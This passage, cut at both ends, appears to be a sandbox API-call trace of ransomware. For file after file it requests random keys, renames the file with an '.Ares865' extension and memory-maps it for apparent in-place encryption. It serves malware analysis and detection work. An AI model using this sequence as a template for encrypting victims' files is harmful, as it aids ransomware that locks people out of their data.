lpFileSize=0x2cce090*=5206) returned 1 [0115.898] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.899] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.899] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.899] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1760, lpName=0x0) returned 0x170 [0115.901] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x190000 [0115.901] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.903] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.903] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.903] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png.Ares865") returned 83 [0115.903] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\40.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\40.png.ares865"), dwFlags=0x1) returned 1 [0115.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\40.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.905] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6260) returned 1 [0115.906] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.906] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.906] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.907] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1b80, lpName=0x0) returned 0x170 [0115.908] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b80) returned 0x190000 [0115.909] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.910] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.910] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.910] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png.Ares865") returned 83 [0115.910] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\41.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\41.png.ares865"), dwFlags=0x1) returned 1 [0115.911] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\41.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.912] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4066) returned 1 [0115.912] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.912] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.912] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.913] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12f0, lpName=0x0) returned 0x170 [0115.915] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f0) returned 0x190000 [0115.916] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.916] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.916] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png.Ares865") returned 83 [0115.917] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\42.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\42.png.ares865"), dwFlags=0x1) returned 1 [0115.919] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\42.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.919] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4405) returned 1 [0115.919] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.920] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.920] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.920] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1440, lpName=0x0) returned 0x170 [0115.921] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1440) returned 0x190000 [0115.922] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.923] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.923] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png.Ares865") returned 83 [0115.924] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\43.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\43.png.ares865"), dwFlags=0x1) returned 1 [0115.925] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\43.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.925] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4405) returned 1 [0115.925] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.926] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.926] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.926] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1440, lpName=0x0) returned 0x170 [0115.927] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1440) returned 0x190000 [0115.929] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.929] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.929] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.930] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png.Ares865") returned 83 [0115.930] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\44.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\44.png.ares865"), dwFlags=0x1) returned 1 [0115.932] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\44.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.932] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2846) returned 1 [0115.932] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.933] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.933] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.933] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe20, lpName=0x0) returned 0x170 [0115.935] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe20) returned 0x190000 [0115.936] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.937] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.937] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.937] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png.Ares865") returned 83 [0115.937] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\45.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\45.png.ares865"), dwFlags=0x1) returned 1 [0115.938] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\45.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.939] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5457) returned 1 [0115.939] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.939] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.939] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.940] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x170 [0115.941] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0115.942] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.943] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.943] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png.Ares865") returned 83 [0115.944] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\46.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\46.png.ares865"), dwFlags=0x1) returned 1 [0115.947] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\46.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.947] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4066) returned 1 [0115.947] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.948] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.948] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.948] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12f0, lpName=0x0) returned 0x170 [0115.950] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f0) returned 0x190000 [0115.953] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.953] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.954] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.954] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png.Ares865") returned 83 [0115.954] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\47.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\47.png.ares865"), dwFlags=0x1) returned 1 [0115.955] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\47.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.956] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5206) returned 1 [0115.956] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.956] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.956] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.957] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1760, lpName=0x0) returned 0x170 [0115.960] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x190000 [0115.963] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.964] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.964] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.964] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png.Ares865") returned 82 [0115.964] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\5.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\5.png.ares865"), dwFlags=0x1) returned 1 [0115.968] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\5.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.968] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5889) returned 1 [0115.968] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.969] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.969] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.969] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a10, lpName=0x0) returned 0x170 [0115.970] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a10) returned 0x190000 [0115.972] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.972] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.972] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.973] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png.Ares865") returned 82 [0115.973] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\6.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\6.png.ares865"), dwFlags=0x1) returned 1 [0115.974] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\6.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.974] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5889) returned 1 [0115.974] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.975] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.975] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.975] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a10, lpName=0x0) returned 0x170 [0115.977] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a10) returned 0x190000 [0115.978] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.979] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.979] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.980] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png.Ares865") returned 82 [0115.980] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\7.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\7.png.ares865"), dwFlags=0x1) returned 1 [0115.981] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\7.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.981] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5889) returned 1 [0115.981] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.982] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.982] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.982] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a10, lpName=0x0) returned 0x170 [0115.986] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a10) returned 0x190000 [0115.988] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.988] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.988] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.989] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png.Ares865") returned 82 [0115.989] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\8.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\8.png.ares865"), dwFlags=0x1) returned 1 [0115.990] CreateFileW (lpFileName="C:\\Program Files 